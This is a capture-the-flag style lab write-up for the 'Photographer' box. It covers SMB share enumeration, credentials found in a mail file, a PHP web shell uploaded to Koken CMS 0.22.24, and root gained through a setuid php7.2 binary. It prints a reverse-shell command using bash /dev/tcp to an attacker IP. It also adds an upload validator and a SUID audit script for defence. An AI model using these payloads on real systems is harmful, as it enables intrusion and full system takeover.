Photographer - OSPG
Summary of Result
With valid credentials acquired from the SMB service, we gain an initial foothold by exploiting the Authenticated Remote Code Execution (RCE) in the vulnerable Koken CMS. We then escalate privileges by abusing a misconfigured SUID binary and obtain root access.
Enumeration
Nmap
We’ll begin with an nmap scan.
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 41:4d:aa:18:86:94:8e:88:a7:4c:6b:42:60:76:f1:4f (RSA)
| 256 4d:a3:d0:7a:8f:64:ef:82:45:2d:01:13:18:b7:e0:13 (ECDSA)
| 256 1a:01:7a:4f:cf:95:85:bf:31:a1:4f:15:87:ab:94:e2 (ED25519)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Photographer by v1n1v131r4
139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8000/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Koken 0.22.24
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: daisa ahomi
→ There are a few running services. Within the scope of this writeup, we are interested in the SMB/445 and HTTP/8000 services.
SMB Enumeration
Let’s start by listing shares with smbclient without providing a password.
$ smbclient -L $IP
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
sambashare Disk Samba on Ubuntu
IPC$ IPC IPC Service (photographer server (Samba, Ubuntu))
From the result, we discover that anonymous access is available for the sambashare share.
Next, let’s open an interactive shell on the sambashare share by running the following command.
$ smbclient \\\\$IP\\sambashare
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Aug 20 11:51:08 2020
.. D 0 Thu Aug 20 12:08:59 2020
mailsent.txt N 503 Mon Jul 20 21:29:40 2020
wordpress.bkp.zip N 13930308 Mon Jul 20 21:22:23 2020
3300080 blocks of size 1024. 2958792 blocks available
There are two files: mailsent.txt and wordpress.bkp.zip. To download them, we run the following from the SMB shell.
...
3300080 blocks of size 1024. 2958792 blocks available
smb: \> mget *
Get file mailsent.txt? y
getting file \mailsent.txt of size 503 as mailsent.txt (245.6 KiloBytes/sec) (average 245.6 KiloBytes/sec)
Get file wordpress.bkp.zip? y
getting file \wordpress.bkp.zip of size 13930308 as wordpress.bkp.zip (183835.1 KiloBytes/sec) (average 179004.0 KiloBytes/sec)
After those files are downloaded, let’s inspect the content of mailsent.txt.
$ cat mailsent.txt
...
To: Daisa Ahomi <daisa@photographer.com>
...
Hi Daisa!
Your site is ready now.
Don't forget your secret, my babygirl ;)
Here is some important information to note:
→ Potential email: daisa@photographer.com.
→ Potential user: daisa.
→ Potential pass: babygirl.
HTTP/8000
Now, let’s gather hidden directories of the web application.
This can be done with ffuf.
$ ffuf -u http://$IP:8000/FUZZ -w common.txt
admin [Status: 301, Size: 321, Words: 20, Lines: 10]
app [Status: 301, Size: 319, Words: 20, Lines: 10]
index.php [Status: 200, Size: 4603, Words: 206, Lines: 95]
server-status [Status: 403, Size: 280, Words: 20, Lines: 10]
storage [Status: 301, Size: 323, Words: 20, Lines: 10]
admin looks promising; navigating to it, we discover that the site is running Koken CMS 0.22.24.
$ curl -s http://192.168.57.76:8000/admin/
...
<title>Koken</title>
<link rel="stylesheet" href="css/console_0.22.24.min.css" />
...
A little further research shows that this version of Koken CMS is known to be vulnerable to Authenticated Arbitrary File Upload.
$ searchsploit koken
---------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------- ---------------------------------
Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated) | php/webapps/48706.txt
---------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Exploitation
Koken CMS RCE
Following the steps in the PoC, we first need to authenticate as the admin user with the credentials obtained earlier: daisa@photographer.com:babygirl.
[1]. Create a malicious .php.jpg file with the following contents.
$ cat image.php.jpg
<?php system($_GET['cmd']);?>
[2]. From the Koken CMS Dashboard:
Click on Import Content in the Library tab → import image.php.jpg → intercept the request with Burp. Rename the file to image.php. Forward the request.
The final payload might look like the following.
POST /api.php?/content HTTP/1.1
Host: 192.168.57.76:8000
...
-----------------------------392967243522561067211768914619
Content-Disposition: form-data; name="name"
image.php
...
-----------------------------392967243522561067211768914619
Content-Disposition: form-data; name="file"; filename="image.php"
Content-Type: image/jpeg
<?php system($_GET['cmd']); ?>
-----------------------------392967243522561067211768914619--
[3]. Back in the Dashboard, hover the mouse over Download File to see where the uploaded file was stored.
If the file was uploaded properly, we can pull a reverse shell with the command below.
$ curl -s http://192.168.57.76:8000/storage/originals/1e/26/image.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.57.200%2F80%200%3E%261%27
Our nc should catch the reverse shell at port 80 as www-data.
$ nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.57.200] from (UNKNOWN) [192.168.57.76] 37502
bash: cannot set terminal process group (1383): Inappropriate ioctl for device
bash: no job control in this shell
www-data@photographer:/var/www/html/koken/storage/originals/1e/26$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
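The bypass above works because Koken trusts the client-supplied filename (and the image/jpeg Content-Type) once the name has been rewritten in Burp. As an added example that is not part of the original writeup or of Koken's own code, the following validator shows the server-side checks that would have refused both image.php and image.php.jpg: an extension allowlist applied to every segment of the name, a magic-byte check on the body, and a server-generated stored name. The samples are constructed and reuse the PoC's PHP stub.

```python
import os
import secrets

# Allowed image extensions and the magic bytes a genuine file of that type starts with.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Server-side executable extensions refused in ANY segment of the name,
# so both image.php and image.php.jpg are rejected.
EXECUTABLE = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "inc"}

class UploadRejected(ValueError):
    pass

def validate_upload(client_name, body):
    """Return a server-generated filename for an acceptable image, else raise.
    client_name is attacker-controlled (as is the multipart Content-Type, which is
    therefore not even consulted); only the bytes of body decide the file type."""
    base = os.path.basename(client_name.replace("\\", "/"))
    segments = base.lower().split(".")
    if len(segments) < 2 or not segments[0]:
        raise UploadRejected("missing name or extension")
    if EXECUTABLE & set(segments[1:]):
        raise UploadRejected("executable extension in name")
    ext = segments[-1]
    if ext not in ALLOWED:
        raise UploadRejected(f"extension .{ext} not allowed")
    if not any(body.startswith(magic) for magic in ALLOWED[ext]):
        raise UploadRejected("content does not match extension")
    # Never store under the client's name: pick a random server-side name.
    return f"{secrets.token_hex(8)}.{ext}"

def classify(client_name, body):
    """Report the validator's decision as a string (used for the samples below)."""
    try:
        validate_upload(client_name, body)
        return "accepted"
    except UploadRejected as exc:
        return f"rejected: {exc}"

# Constructed samples: the writeup's PHP stub under the names used in the PoC,
# plus a minimal JPEG header standing in for a real photo.
PHP_STUB = b"<?php system($_GET['cmd']); ?>"
JPEG_STUB = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"
SAMPLES = [("image.php.jpg", PHP_STUB), ("image.php", PHP_STUB),
           ("image.jpg", PHP_STUB), ("holiday.photo.jpg", JPEG_STUB)]
```

Running classify over SAMPLES rejects the first three and accepts only the genuine JPEG, which is then stored under a random name rather than the one the client sent.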
Privilege Escalation
Misconfigured SUID Binary
Enumerating the system locally reveals a misconfigured SUID binary that leads to privilege escalation.
www-data@photographer:/var/www$ find / -perm -u=s -exec ls -al {} \; 2>/dev/null
...
-rwsr-xr-x 1 root root 4883680 Jul 9 2020 /usr/bin/php7.2
...
With the www-data shell, we execute
www-data@photographer:/var/www$ /usr/bin/php7.2 -r "pcntl_exec('/bin/bash', ['-p']);"
root@photographer:/var/www# whoami
root
and successfully compromise root!
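A setuid-root interpreter such as php7.2 hands a root shell to any local user, so the find command above is worth turning into a repeatable audit. The script below is an added example, not part of the original writeup: it walks the filesystem, flags any setuid-root interpreter or shell as critical, and flags anything outside a baseline as needing review. The baseline list and the sample entries are constructed assumptions, not data from the box.

```python
import os
import re
import stat

# Setuid-root binaries that are normal on an Ubuntu 16.04-era host (constructed baseline;
# trim or extend it to match your own build).
EXPECTED = {
    "/bin/mount", "/bin/umount", "/bin/su", "/bin/ping", "/bin/ping6", "/usr/bin/passwd",
    "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/usr/bin/pkexec", "/usr/lib/openssh/ssh-keysign", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper"}
# Interpreters and shells: a setuid-root copy executes whatever the caller asks for,
# which is exactly what the php7.2 binary in the writeup allowed.
INTERPRETER = re.compile(r"^(php|python|perl|ruby|node|lua|bash|sh|dash|zsh|ksh|busybox)(\d|\.|-|$)")

def classify_suid(path, mode, uid):
    """Verdict for one file, or None when it is not a setuid-root regular file."""
    if not stat.S_ISREG(mode) or not (mode & stat.S_ISUID) or uid != 0:
        return None
    if INTERPRETER.match(os.path.basename(path)):
        return "critical: setuid-root interpreter"
    if path not in EXPECTED:
        return "review: setuid-root binary outside baseline"
    return "ok"

def audit(entries):
    """entries: (path, st_mode, st_uid) triples -> {path: verdict} for setuid-root files."""
    verdicts = ((p, classify_suid(p, m, u)) for p, m, u in entries)
    return {p: v for p, v in verdicts if v is not None}

def walk_filesystem(root="/"):
    """Yield (path, mode, uid) for every file under root; unreadable entries are skipped."""
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            yield path, st.st_mode, st.st_uid

# Constructed sample mirroring the find output in the writeup (0o104755 = -rwsr-xr-x).
SAMPLE = [("/usr/bin/php7.2", 0o104755, 0), ("/usr/bin/passwd", 0o104755, 0),
          ("/bin/ls", 0o100755, 0), ("/opt/backup/run-backup", 0o104755, 0),
          ("/usr/bin/python3.5", 0o104755, 1000)]

if __name__ == "__main__":
    for path, verdict in sorted(audit(walk_filesystem()).items()):
        print(f"{verdict:45} {path}")
```

On the sample, php7.2 is reported as critical, passwd as ok, the backup script as needing review, and the non-SUID and non-root entries are ignored.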